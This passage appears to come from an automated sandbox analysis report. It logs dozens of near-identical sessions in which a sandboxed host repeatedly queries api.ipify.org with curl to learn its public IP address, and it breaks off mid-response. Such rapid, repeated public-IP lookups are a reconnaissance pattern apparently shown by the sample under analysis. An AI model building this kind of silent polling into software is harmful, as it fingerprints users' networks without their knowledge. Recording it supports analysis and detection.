                                  Jul 11, 2024 08:34:57.152918100 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:57.306449890 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:57 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c54b9f7b7bac-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  96192.168.11.2049877104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:57.973500967 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:58.123008013 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:58 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c550bcd7451b-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  97192.168.11.2049878104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:58.793071985 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:58.937107086 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:58 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c555dfff4520-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  98192.168.11.2049879104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:34:59.589848042 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:34:59.740845919 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:34:59 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c55ada631355-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  99192.168.11.2049880104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:00.386590958 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:00.531099081 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:00 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c55fc91012d6-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  100192.168.11.2049881104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:01.167582035 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:01.312334061 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:01 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c564aae1c00c-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  101192.168.11.2049882104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:01.964332104 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:02.114062071 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:02 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c569a8e353b2-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  102192.168.11.2049883104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:02.745346069 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:02.954008102 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:02 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c56e8bf9bfa8-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  103192.168.11.2049884104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:03.588947058 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:03.732609987 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:03 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c573ca2d184b-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  104192.168.11.2049885104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:04.362617016 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:04.509419918 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:04 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c578a9ccbd03-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  105192.168.11.2049886104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:05.222016096 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:05.367186069 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:05 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c57e0dafb088-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  106192.168.11.2049887104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:06.010380030 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:06.155435085 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:06 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c582f9d7b033-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  107192.168.11.2049888104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:06.806947947 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:06.949951887 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:06 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c587ea827bc3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  108192.168.11.2049889104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:07.635034084 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:07.782322884 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:07 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c58d1f45bcf2-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  109192.168.11.2049890104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:08.431585073 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:08.578027964 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:08 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c592197bbafb-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  110192.168.11.2049891104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:09.244009018 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:09.391911030 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:09 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5972abe458f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  111192.168.11.2049892104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:10.080302954 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:10.226382017 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:10 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c59c693cb054-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  112192.168.11.2049893104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:10.852948904 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:10.998234987 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:10 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5a13e008bba-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  113192.168.11.2049894104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:11.649683952 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:11.793800116 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:11 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5a63bfe7bab-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  114192.168.11.2049895104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:12.524399996 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:12.668397903 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:12 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5abaf24c00c-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  115192.168.11.2049896104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:13.321264029 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:13.468060017 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:13 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5b0ae7a44e4-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  116192.168.11.2049897104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:14.133783102 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:14.277647018 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:14 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5b5bc8cbd2d-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  117192.168.11.2049898104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:14.914525986 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:15.058829069 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:15 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5ba9fa2baf0-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  118192.168.11.2049899104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:15.711273909 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:15.862387896 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:15 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5bf9c7344d0-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  119192.168.11.2049900104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:16.501111984 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:16.648631096 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:16 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5c48a624514-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  120192.168.11.2049901104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:17.313530922 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:17.461754084 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:17 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5c99e0ebd2b-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  121192.168.11.2049902104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:18.132563114 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:18.279215097 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:18 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5cebe54bf90-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  122192.168.11.2049903104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:19.382318974 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:19.533174992 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:19 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5d68c1107e2-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  123192.168.11.2049904104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:20.147783041 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:20.295651913 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:20 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5db4e10ad8e-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  124192.168.11.2049905104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:20.913229942 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:21.060601950 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:21 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5e01f8fad9a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  125192.168.11.2049906104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:21.663075924 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:21.808677912 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:21 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5e4cbd5b033-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  126192.168.11.2049907104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:22.412869930 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:22.567332983 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:22 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5e97ab6c002-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  127192.168.11.2049908104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:23.162775993 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:23.309861898 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:23 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5ee2ed3bfa4-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  128192.168.11.2049909104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:23.928169012 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:24.073729038 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:24 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5f2ea71bce0-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  129192.168.11.2049910104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:24.693607092 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:24.837776899 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:24 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5f7bed4bfd3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  130192.168.11.2049911104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:25.443437099 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:25.591609001 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:25 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c5fc69c7b0eb-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  131192.168.11.2049912104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:26.177676916 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:26.328619003 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:26 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c600ffaaade3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  132192.168.11.2049913104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:26.927546978 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:27.075002909 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:27 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c605ad83afef-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  133192.168.11.2049914104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:35:27.692954063 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:35:27.836457968 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:35:27 GMT
                                  Content-Type: text/plain
